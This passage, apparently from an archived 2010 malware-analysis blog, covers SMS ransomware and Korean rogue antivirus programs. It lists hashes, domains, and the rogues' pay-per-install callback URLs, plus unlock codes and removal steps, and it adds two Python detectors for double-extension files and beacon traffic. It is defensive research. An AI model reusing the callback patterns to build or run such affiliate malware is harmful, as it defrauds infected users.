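    "20830c687b1535aefa1f281fb1c6a513": "vip_porno_49873.avi.exe",
    "6e4ecc96a88e36c9ec12d4b500aef331": "vip_porno_79341.avi.exe",
    "3c637427af826f877a50c5a8763fe4f0": "vip_porno_81380.avi.exe",
}

# Naming scheme used by this campaign: vip_porno_<digits>.avi.exe
CAMPAIGN_NAME = re.compile(r"^vip_porno_\d+\.avi\.exe$", re.IGNORECASE)

# Generic heuristic: media/document extension immediately followed by an
# executable extension, so Explorer shows "video.avi" when extensions are hidden.
MEDIA_EXTS = ("avi", "mpg", "mpeg", "wmv", "mp4", "jpg", "png", "doc", "pdf")
DOUBLE_EXT = re.compile(
    r"\.(" + "|".join(MEDIA_EXTS) + r")\.(exe|scr|com|pif)$", re.IGNORECASE
)

Finding = Tuple[str, str, str]  # (path, severity, reason)


def classify(path: str, md5: str) -> List[Finding]:
    """Return every finding for one inventory record (empty list if clean)."""
    name = path.replace("\\", "/").rsplit("/", 1)[-1]
    digest = md5.strip().lower()          # inventories often emit upper-case hex
    findings: List[Finding] = []
    if digest in KNOWN_SAMPLES:
        findings.append((path, "high",
                         "MD5 matches known PornoBlocker/LockScreen sample "
                         + KNOWN_SAMPLES[digest]))
    if CAMPAIGN_NAME.match(name):
        findings.append((path, "medium",
                         "file name follows the vip_porno_<n>.avi.exe campaign scheme"))
    elif DOUBLE_EXT.search(name):
        findings.append((path, "low",
                         "executable disguised with a media/document double extension"))
    return findings


def scan_inventory(records: Iterable[Dict[str, str]]) -> List[Finding]:
    """Run classify() over {'path': ..., 'md5': ...} records, worst first."""
    order = {"high": 0, "medium": 1, "low": 2}
    out: List[Finding] = []
    for rec in records:
        out.extend(classify(rec["path"], rec["md5"]))
    return sorted(out, key=lambda f: order[f[1]])   # stable: keeps input order within a level


# Constructed inventory: a listed sample, a renamed copy of a listed sample,
# a look-alike with an unknown hash, a generic double extension, and a clean file.
PLACEHOLDER_MD5 = "d41d8cd98f00b204e9800998ecf8427e"   # MD5 of empty input (constructed)
SAMPLE_INVENTORY = [
    {"path": r"C:\Users\victim\Downloads\vip_porno_12730.avi.exe",
     "md5": "5b1d7ce7acf6de3e8b7d856bdc6127ba"},
    {"path": r"C:\Temp\setup.exe", "md5": "20830C687B1535AEFA1F281FB1C6A513"},
    {"path": r"C:\Users\victim\Desktop\vip_porno_00001.avi.exe", "md5": PLACEHOLDER_MD5},
    {"path": r"D:\share\holiday.jpg.scr", "md5": PLACEHOLDER_MD5},
    {"path": r"C:\Windows\System32\notepad.exe", "md5": PLACEHOLDER_MD5},
]

if __name__ == "__main__":
    for path, severity, reason in scan_inventory(SAMPLE_INVENTORY):
        print(f"[{severity:6}] {path}: {reason}")
```

Hash matches are rated high because a renamed copy is still the same binary; the name-based rules are rated lower because a fresh build of the same campaign (new hash, same naming scheme) or an unrelated double-extension file only warrants a look, not an automatic verdict.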
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TIBZUSAzKdI/AAAAAAAAAW8/xXf3mAOrNqo/s1600/MI_100rubles.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="175" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TIBZUSAzKdI/AAAAAAAAAW8/xXf3mAOrNqo/s400/MI_100rubles.jpg" width="400" /></a></div><br />
<div style="text-align: justify;">In all campaigns of this variant of ransomware that have appeared so far, the amount requested has been 400 rubles.</div><br />
<div style="text-align: justify;">Another peculiarity is that it belongs to the generation of ransomware whose dissemination strategy exploits pornographic resources, either through websites or through domains whose content is tuned, by means of SEO strategies, with words referring to that type of content.</div><br />
<span style="font-size: large;"><b>Countermeasures</b></span><br />
Unlock codes for the following numbers:<br />
<br />
<b>89653625352</b><br />
Unlock code: <b>@34208923@</b><br />
<br />
<b>89653686497</b><br />
Unlock code: <b>10779401</b><br />
<br />
<b>89653276574</b><br />
Unlock code: <b>17661888</b><br />
<br />
<b>89652404438</b><br />
Unlock code: <b>!48950345!</b><br />
<br />
<b>89646283842</b><br />
Unlock code: <b>10070000008000</b><br />
<br />
<b>89636385700<br />
89636385707<br />
89636385755<br />
89636385675</b><br />
Unlock code: <b>$73747589$</b><br />
<br />
<b>89629911485<br />
89629911932<br />
89629911658<br />
89629910152<br />
89629910824<br />
89629910747<br />
89629910275<br />
89629909846</b><br />
Unlock code: <b>10200000000000003</b><br />
<br />
<b>89057635571<br />
89055280410<br />
89055280241</b><br />
Unlock code: <b>$73747589$</b><br />
<br />
<b>89055282108</b><br />
Unlock code: <b>^77723094^</b><br />
<br />
<b>Related information</b><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/new-russian-sms-ransomware-in-wild.html" style="color: orange;">New Russian SMS ransomware In-the-Wild</a> <br />
<a href="http://malwaredisasters.blogspot.com/2010/07/sms-ransomware-porn-template-update.html" style="color: orange;">SMS Ransomware porn template update</a> <br />
<a href="http://malwaredisasters.blogspot.com/2010/07/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites IV</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/06/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites III</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/05/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites II</a> <br />
<a href="http://malwaredisasters.blogspot.com/2010/04/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/another-very-active-sms-ransomware.html" style="color: orange;">Another very active SMS Ransomware</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/sms-ransomware-for-windows-in-wild.html" style="color: orange;">SMS Ransomware for Windows In-the-Wild</a><br />
<br />
Jorge Mieres<br />
<br />
<b>AntiSpy Safeguard with new social engineering approach</b> (published 2010-08-31)<br />
<div style="text-align: justify;"><b>AntiSpy Safeguard </b>is a new rogue that is In-the-Wild and whose spread relies on a new form of deception: a video and a false report in the style of the services offered by <a href="http://www.virustotal.com/" style="color: orange;">VirusTotal</a> or <span style="color: orange;">Virscan</span>.</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/THxwgst9gEI/AAAAAAAAAWk/TpU-QI-dh60/s1600/MI_rogue-video.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="155" src="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/THxwgst9gEI/AAAAAAAAAWk/TpU-QI-dh60/s400/MI_rogue-video.png" width="400" /></a></div><div style="text-align: justify;">The following image shows the initial interface displayed on a system infected by this rogue.</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/THxwJeQRoaI/AAAAAAAAAWU/oR0xJ9yvbpc/s1600/MI_rogue.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/THxwJeQRoaI/AAAAAAAAAWU/oR0xJ9yvbpc/s400/MI_rogue.png" width="400" /></a></div><br />
Read the full report on the <a href="http://malwareint.blogspot.com/2010/08/fakeav-via-new-strategy-of-deception.html"><span style="color: orange;">MalwareIntelligence blog</span></a>.<br />
<br />
<b>Related information</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://twitter.com/jorgemieres" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="100" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TEJjsQv18QI/AAAAAAAAAQc/00l0WDs0VO0/s200/follow_tw.png" width="100" /></a></div><a href="http://malwaredisasters.blogspot.com/2010/08/litter-korean-rogue-lurking-v.html" style="color: orange;">Litter Korean rogue lurking V</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/pc-defender-antivirus-rogue-update.html" style="color: orange;">PC Defender Antivirus rogue update system registry</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/phoenix-exploits-kit-and-pay-per.html" style="color: orange;">Phoenix Exploit's Kit and Pay-per-Install via PC Defender Antivirus</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/dangerous-trojans-keyloggers-and.html" style="color: orange;">Dangerous trojans, keyloggers and Spyware detected in you computer!!!</a><br />
<a href="http://malwaredisasters.blogspot.com/2009/12/desktop-hijack-by-internet-security.html" style="color: orange;">Desktop Hijack by Internet Security 2010. Your System Is Infected!</a><div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1670645896303580754.post-70097778656817114932010-08-29T03:01:00.000+01:002010-08-29T03:01:28.306+01:00Litter Korean rogue lurking V<div style="text-align: justify;">Another Korean rogue, belonging to the same family as <b>PrivacyKeep</b>, <b>PrivacyCorp</b> and <b>PCScan</b>.</div><br />
<b>ProtectInfo</b><br />
protectinfo.co.kr - <b>114.108.168.8</b> - DACOM-NET LG DACOM<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/THm-GsdlCxI/AAAAAAAAAVc/okzYmEgJjK8/s1600/MI_pi.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="188" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/THm-GsdlCxI/AAAAAAAAAVc/okzYmEgJjK8/s400/MI_pi.png" width="400" /></a></div><br />
The same IP address also hosts the following domains:<br />
ad-clear.com<br />
privacycop.co.kr<br />
privacykeep.co.kr<br />
protectinfo.co.kr<br />
<br />
<b>protectinfo_home.exe</b> (<a href="http://www.virustotal.com/file-scan/report.html?id=52c8cbdaf314adaeeb58f3f4184884203e7cf9cb52545367cf7205c2661dfe4a-1282259983" style="color: orange;">a48e62c64f68a2b32dc601efffa2973d</a>)<br />
<br />
update.protectinfo.co.kr/instchk.php<br />
<br />
<i><span style="font-size: x-small;">226<br />
[COUNTER]<br />
NUM=6<br />
<br />
[CHECK1]<br />
HKEY=HKLM<br />
REGPATH=............<br />
REGNAME=DisplayName<br />
REGVALUE=............<br />
<br />
[CHECK2]<br />
HKEY=HKLM<br />
REGPATH=PrivacyCheck<br />
REGNAME=DisplayName<br />
REGVALUE=.......... ....<br />
<br />
[CHECK3]<br />
HKEY=HKLM<br />
REGPATH=............<br />
REGNAME=DisplayName<br />
REGVALUE=............<br />
<br />
[CHECK4]<br />
HKEY=HKLM<br />
REGPATH=............<br />
REGNAME=DisplayName<br />
REGVALUE=............<br />
<br />
[CHECK5]<br />
HKEY=HKLM<br />
REGPATH=..........<br />
REGNAME=DisplayName<br />
REGVALUE=..........<br />
<br />
[CHECK6] <br />
HKEY=HKLM<br />
REGPATH=privacykeep<br />
REGNAME=DisplayName<br />
REGVALUE=............<br />
<br />
[HISTORYREG]<br />
PATH="............" </span></i><br />
<br />
protectinfo.co.kr/app_linkage/app_install.php?addr=000C29CA888C&ptn=infocode0067<br />
protectinfo.co.kr/app_linkage/app_setting.php?mac=00-0C-29-CA-88-8C <br />
<br />
<i><span style="font-size: x-small;">3d <br />
payed=0<br />
pw_usr=<br />
pw_sup=1470<br />
hp1=<br />
hp2=<br />
hp3=<br />
small=300<br />
big=300</span></i><br />
<br />
log.adsence.co.kr/logexp.php?aid=protectinfo&pid=infocode0067&kind=inst <br />
file.protectinfo.co.kr/update.php<br />
<br />
<i><span style="font-size: x-small;">protectinfo.exe=0.325<br />
pnfoupdater.exe=0.113<br />
pnfohk.dll=0.110<br />
pnfouninst.exe=0.1<br />
pnfowcher.exe=0.116<br />
pnfopopd.dll=0.1</span></i><br />
<br />
protectinfo.co.kr/app_linkage/app_boot.php?ver=.0.398<br />
protectinfo.co.kr/popup_settle.html?addr=00-0C-29-CA-88-8C<br />
protectinfo.co.kr/settlement/paysys/mobile/Deliver.php<br />
protectinfo.co.kr/settlement/paysys/pbill/Deliver.php<br />
protectinfo.co.kr/settlement/paysys/ars/Deliver.php<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/THm-5DgXRLI/AAAAAAAAAVk/C2NmKAPcMSA/s1600/MI_protectinfo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="220" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/THm-5DgXRLI/AAAAAAAAAVk/C2NmKAPcMSA/s400/MI_protectinfo.png" width="400" /></a></div><br />
<br />
<span style="font-size: large;"><b>Countermeasures</b></span><br />
<br />
Uninstall from Program Files.<br />
Run an updated antivirus.<br />
<br />
<b>Related information</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://twitter.com/jorgemieres" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="100" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TEJjsQv18QI/AAAAAAAAAQc/00l0WDs0VO0/s200/follow_tw.png" width="100" /></a></div><br />
<br />
<a href="http://malwaredisasters.blogspot.com/2010/08/litter-korean-rogue-lurking-iv.html" style="color: orange;">Litter Korean rogue lurking IV</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/litter-korean-rogue-lurking-ii.html" style="color: orange;">Litter Korean rogue lurking III</a><br />
<span style="color: orange;"><a href="http://malwaredisasters.blogspot.com/2010/08/litter-korean-rogue-lurking-ii.html" style="color: orange;">Litter Korean rogue lurking II</a> </span><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/litter-korean-rogue-lurking-i.html"><span style="color: orange;">Litter Korean rogue lurking I</span> </a><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/pc-defender-antivirus-rogue-update.html" style="color: orange;">PC Defender Antivirus rogue update system registry</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/phoenix-exploits-kit-and-pay-per.html" style="color: orange;">Phoenix Exploit's Kit and Pay-per-Install via PC Defender Antivirus</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/dangerous-trojans-keyloggers-and.html" style="color: orange;">Dangerous trojans, keyloggers and Spyware detected in you computer!!!</a><br />
<a href="http://malwaredisasters.blogspot.com/2009/12/desktop-hijack-by-internet-security.html" style="color: orange;">Desktop Hijack by Internet Security 2010. Your System Is Infected!</a><br />
<br />
Jorge Mieres <div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1670645896303580754.post-55500301921773594312010-08-22T16:38:00.000+01:002010-08-22T16:38:00.093+01:00Litter Korean rogue lurking IV<div style="text-align: justify;">Fourth part of the "litter" of Korean rogues that have been lurking over the past few days looking for potential victims in Korea. Rogues that spread widely sometimes include an option to change the language so that the infection coverage is much wider; in this case, however, the rogue is aimed at a specific population.</div><br />
<b>PrivacyCorp</b><br />
privacycop.co.kr - <b>114.108.168.8</b> - DACOM-NET LG DACOM<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/THCcMAk5IxI/AAAAAAAAAVE/i-aimwncf30/s1600/MI_pc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="143" src="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/THCcMAk5IxI/AAAAAAAAAVE/i-aimwncf30/s400/MI_pc.png" width="400" /></a></div><br />
The same IP also hosts the following domains:<br />
ad-clear.com<br />
info-dr.com<br />
<br />
<b>privacycop_setup.exe</b> (<a href="http://www.virustotal.com/file-scan/report.html?id=b207105421b1a94021572970ec69d4e7649a5de53f5aed856f53de8148a25deb-1282088693" style="color: orange;">8362c089bc4f7932dc885e23044cb2f6</a>)<br />
<b>privacy_mediccop.exe</b> (<a href="http://www.virustotal.com/file-scan/report.html?id=b6f02a469db1d6938bbc31a8cbfa83d5cef802d7f7accfdb7ce48912c6c136b5-1281974806" style="color: orange;">46f2a84d7217a5ca56208ea0b13c6f52</a>)<br />
<br />
<div style="text-align: justify;">Rogues are part of a criminal circuit built on affiliate systems whose operators pay a percentage for each installation of the threat they spread. This case is no exception: the rogue reports a successful installation immediately after infection.</div><br />
privacycop.co.kr/app_linkage/app_install.php?addr=000C29CA888C&ptn=home<br />
log.adsence.co.kr/logexp.php?aid=privacycop&pid=home&kind=inst<br />
privacycop.co.kr/app_linkage/app_setting.php?mac=00-0C-29-CA-88-8C <br />
3e <br />
payed=0<br />
pw_usr=<br />
pw_sup=1470<br />
hp1=<br />
hp2=<br />
hp3=<br />
small=300<br />
big=3660<br />
<br />
file.privacycop.co.kr/update.php <br />
6d <br />
privacycop.exe=0.328<br />
pvcupdater.exe=0.112<br />
pvchk.dll=0.1<br />
pvcuninst.exe=0.1<br />
pvcwcher.exe=0.112<br />
pvcpopd.dll=0.1<br />
<br />
privacycop.co.kr/app_linkage/app_boot.php?ver=.0.4.5.3 <br />
privacycop.co.kr/popup_settle.html?addr=00-0C-29-CA-88-8C<br />
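Because the callbacks listed above key every request on the victim's MAC address and a partner tag, the affiliate activity is easy to pick out of proxy logs. The following Python is an added example, not code from the original post or from the rogue: it matches the callback paths documented across this series (the privacycop/protectinfo app_linkage pages, logexp.php, and the pcscan settle/value pages) against constructed log lines and groups the hits per infected machine.

```python
"""Flag pay-per-install (PPI) beacons of the Korean rogue family in proxy logs.

Added example; not code from the original post or from the rogue. The URL
shapes come from the callbacks documented in this series; the log lines in
SAMPLE_LOG are constructed for the example.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Path suffixes seen in the posts, mapped to what the request does. Matching on
# the path rather than the host means a re-hosted copy of the same kit on a
# new domain is still caught.
BEACON_PATHS = {
    "app_linkage/app_install.php": "install report",
    "app_linkage/app_setting.php": "settings fetch",
    "pcboanplus/install.php": "install report",
    "logexp.php": "affiliate log",
    "value.php": "install report",
    "settle.php": "payment page",
    "popup_settle.html": "payment popup",
}
# Query parameters that carry the victim's MAC address (the kit's machine id)
# and the partner / product tag that decides who gets paid for the install.
MAC_PARAMS = ("addr", "mac", "strPC")
TAG_PARAMS = ("ptn", "pid", "partner", "strID", "aid")
MAC_RE = re.compile(r"^[0-9A-Fa-f]{2}(?:-?[0-9A-Fa-f]{2}){5}$")

# Constructed sample in the form "<time> <client> <method> <url>"; two benign
# lines are mixed in, one of them hitting an unrelated settle.php.
SAMPLE_LOG = """\
12:00:01 10.0.0.7 GET http://privacycop.co.kr/app_linkage/app_install.php?addr=000C29CA888C&ptn=home
12:00:01 10.0.0.7 GET http://log.adsence.co.kr/logexp.php?aid=privacycop&pid=home&kind=inst
12:00:02 10.0.0.7 GET http://privacycop.co.kr/app_linkage/app_setting.php?mac=00-0C-29-CA-88-8C
12:00:05 10.0.0.9 GET http://www.example.com/index.html
12:01:10 10.0.0.7 GET http://pcscan.kr/settle.php?strID=PCScan&arg=type1&strPC=000c29ca888c&strSite=pcscan.kr
12:01:11 10.0.0.9 GET http://www.example.com/app/settle.php?order=42
"""


@dataclass(frozen=True)
class Beacon:
    host: str
    kind: str
    mac: Optional[str]  # normalised as AA:BB:CC:DD:EE:FF
    tag: Optional[str]  # partner / product tag


def normalize_mac(value: str) -> Optional[str]:
    """Accept 000C29CA888C or 00-0C-29-CA-88-8C; return AA:BB:... or None."""
    if not MAC_RE.match(value):
        return None
    digits = value.replace("-", "").upper()
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2))


def classify_url(url: str) -> Optional[Beacon]:
    """Return a Beacon if url is a known callback carrying a machine id or tag."""
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    kind = next((k for s, k in BEACON_PATHS.items()
                 if parts.path.endswith("/" + s)), None)
    if kind is None:
        return None
    query = parse_qs(parts.query, keep_blank_values=True)
    mac = next((normalize_mac(query[p][0]) for p in MAC_PARAMS if p in query), None)
    tag = next((query[p][0] for p in TAG_PARAMS if query.get(p, [""])[0]), None)
    if mac is None and tag is None:
        return None  # a generic settle.php / value.php without the kit's identifiers
    return Beacon(parts.hostname or "", kind, mac, tag)


def scan_log(lines) -> List[Beacon]:
    """Run classify_url over '<time> <client> <method> <url>' log lines."""
    found = []
    for line in lines:
        fields = line.split()
        if len(fields) < 4:
            continue
        beacon = classify_url(fields[3])
        if beacon is not None:
            found.append(beacon)
    return found


def victims(beacons) -> Dict[str, List[str]]:
    """Group the contacted hosts by normalised MAC, i.e. per infected machine."""
    out: Dict[str, set] = {}
    for b in beacons:
        if b.mac:
            out.setdefault(b.mac, set()).add(b.host)
    return {mac: sorted(hosts) for mac, hosts in out.items()}


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG.splitlines())
    for b in hits:
        print(f"{b.host:22} {b.kind:15} mac={b.mac} tag={b.tag}")
    print(victims(hits))
```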
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/THCcwcJj0XI/AAAAAAAAAVM/8ZaG5gxLa2I/s1600/MI_pc-scan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="171" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/THCcwcJj0XI/AAAAAAAAAVM/8ZaG5gxLa2I/s400/MI_pc-scan.png" width="400" /></a></div><br />
<span style="font-size: large;"><b>Countermeasures</b></span><br />
Terminate the processes called <b>privacycop.exe</b> and <b>pvcwcher.exe</b>. You can use <a href="http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx" style="color: orange;">Process Explorer</a> to view and terminate processes.<br />
<br />
Uninstall from Program Files.<br />
Run an updated antivirus.<br />
<br />
<b>Related information</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://twitter.com/jorgemieres" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="100" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TEJjsQv18QI/AAAAAAAAAQc/00l0WDs0VO0/s200/follow_tw.png" width="100" /></a></div><a href="http://malwaredisasters.blogspot.com/2010/08/litter-korean-rogue-lurking-ii.html" style="color: orange;">Litter Korean rogue lurking III</a><br />
<span style="color: orange;"><a href="http://malwaredisasters.blogspot.com/2010/08/litter-korean-rogue-lurking-ii.html" style="color: orange;">Litter Korean rogue lurking II</a> </span><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/litter-korean-rogue-lurking-i.html"><span style="color: orange;">Litter Korean rogue lurking I</span> </a><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/pc-defender-antivirus-rogue-update.html" style="color: orange;">PC Defender Antivirus rogue update system registry</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/phoenix-exploits-kit-and-pay-per.html" style="color: orange;">Phoenix Exploit's Kit and Pay-per-Install via PC Defender Antivirus</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/dangerous-trojans-keyloggers-and.html" style="color: orange;">Dangerous trojans, keyloggers and Spyware detected in you computer!!!</a><br />
<a href="http://malwaredisasters.blogspot.com/2009/12/desktop-hijack-by-internet-security.html" style="color: orange;">Desktop Hijack by Internet Security 2010. Your System Is Infected!</a><div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1670645896303580754.post-47679144832651237222010-08-22T14:16:00.000+01:002010-08-22T14:16:00.886+01:00Litter Korean rogue lurking III<div style="text-align: justify;"><b>PCScan</b> is another of the Korean rogues that have appeared in recent days, in addition to the two shown previously.</div><br />
pcscan.kr - <b>114.108.129.233</b> - DACOM-NET LG DACOM<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/THBCbgWhN2I/AAAAAAAAAU8/Y-p8hvfQopg/s1600/MI_PCScan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="202" src="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/THBCbgWhN2I/AAAAAAAAAU8/Y-p8hvfQopg/s400/MI_PCScan.png" width="400" /></a></div>The same IP also hosts the following domains:<br />
eroza.net<br />
master.to84.net<br />
to84.net<br />
www.tvbaro.net<br />
<br />
Setup.exe (<a href="http://www.virustotal.com/file-scan/report.html?id=b0c9c02ae7f6800ab8aa2a83f25ac2c6ce301c16eb6f69036d83bd29a9a3625f-1282037567" style="color: orange;">a85900759318ea66dc94ba789aae2cfe</a>)<br />
PCScan.exe (<a href="http://www.virustotal.com/file-scan/report.html?id=8e6bee10c71e38d2659509cbe7ab0ae8605f0e4d86c47e2362cf097b371a3618-1280882953" style="color: orange;">665b846b82d959843744d9d3a7b39bdc</a>)<br />
PCScanMon.exe (<span style="color: orange;">01cdb8f8955a4df6eebb1aca04d6a43c</span>)<br />
Uninstall.exe (<a href="http://www.virustotal.com/file-scan/report.html?id=4ba6e7ddec920ae9a408becef3a6a03b8fe94ce227654058208a49a0692570dd-1282074848" style="color: orange;">76cd1340bded9d96050df30999f6274d</a>)<br />
<br />
<div style="text-align: justify;">The <b>Uninstall.exe</b> file simulates the uninstaller of the supposed antivirus program; however, it has no effect, because it is fake.</div><br />
It queries the following pages:<br />
pcscan.kr/request/module_setup.php?p=PCScan&a=type1 <br />
pcscan.kr/request/License.txt<br />
pcscan.kr/down/install.exe<br />
down.elineguide.com/down/install.exe<br />
<br />
pcscan.kr/down/files.php?strMode=setup&strID=PCScan&arg=type1&strSite=&strPC=000c29ca888c <br />
pcscan.kr/down/PCScan.exe<br />
pcscan.kr/down/PCScanMon.exe<br />
pcscan.kr/down/Uninstall.exe<br />
pcscan.kr/down/PCScanControl.dll<br />
<br />
pcscan.kr/value.php?strMode=setup&strID=PCScan&arg=type1&strSite=&strPC=000c29ca888c&url=<br />
pcscan.kr/settle.php?strID=PCScan&arg=type1&strPC=000c29ca888c&strSite=pcscan.kr<br />
pcscan.kr/bill_danal/bill_home/with_bill.php?strID=PCScan&arg=type1&strPC=000c29ca888c&strSite=pcscan.kr<br />
pcscan.kr/consultation.php<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/THBCQ-UXTlI/AAAAAAAAAU0/biYotlVKvlQ/s1600/MI_PCscaner.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="337" src="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/THBCQ-UXTlI/AAAAAAAAAU0/biYotlVKvlQ/s400/MI_PCscaner.png" width="400" /></a></div><br />
<span style="font-size: large;"><b>Countermeasure</b></span><br />
<br />
Terminate the process called PCScan.exe. You can use <a href="http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx" style="color: orange;">Process Explorer</a> to view and terminate processes.<br />
<br />
Remove the PCScan folder (which houses six files) located at C:\Program Files\pcscan\.<br />
<br />
Delete the pcscan value from the system registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, which refers to "C:\Program Files\pcscan\pcscan.exe". You can use <a href="http://technet.microsoft.com/en-us/sysinternals/bb963902.aspx" style="color: orange;">Autoruns</a> to view and delete the entry.<br />
<br />
Delete the desktop shortcut.<br />
<br />
Run an updated antivirus.<br />
<br />
<b>Related information</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://twitter.com/jorgemieres" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="100" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TEJjsQv18QI/AAAAAAAAAQc/00l0WDs0VO0/s200/follow_tw.png" width="100" /></a></div><a href="http://malwaredisasters.blogspot.com/2010/08/litter-korean-rogue-lurking-ii.html" style="color: orange;">Litter Korean rogue lurking II</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/litter-korean-rogue-lurking-i.html" style="color: orange;">Litter Korean rogue lurking I</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/pc-defender-antivirus-rogue-update.html" style="color: orange;">PC Defender Antivirus rogue update system registry</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/phoenix-exploits-kit-and-pay-per.html" style="color: orange;">Phoenix Exploit's Kit and Pay-per-Install via PC Defender Antivirus</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/dangerous-trojans-keyloggers-and.html" style="color: orange;">Dangerous trojans, keyloggers and Spyware detected in you computer!!!</a><br />
<a href="http://malwaredisasters.blogspot.com/2009/12/desktop-hijack-by-internet-security.html" style="color: orange;">Desktop Hijack by Internet Security 2010. Your System Is Infected!</a><div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1670645896303580754.post-67999216588710435682010-08-21T20:50:00.000+01:002010-08-21T20:50:21.134+01:00Litter Korean rogue lurking II<div style="color: black;">This is another rogue belonging to the litter that is currently lurking. Its name is <b>PC Boan Plus</b>.<br />
</div>pcboanplus.com - <b>222.122.84.56</b> - KORNET KOREA TELECOM<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/THAk9Bw12_I/AAAAAAAAAUc/n9Z_IMwzzbc/s1600/MI_PCboan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="206" src="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/THAk9Bw12_I/AAAAAAAAAUc/n9Z_IMwzzbc/s400/MI_PCboan.png" width="400" /></a></div>Domains that resolve to the same IP:<br />
postmaster.8282tv.co.kr<br />
pspd.org<br />
<br />
<b>PcBoanPlus2SetupH.exe</b> (0ab2cc07373a4b88a0084f12ae63f54f)<br />
<br />
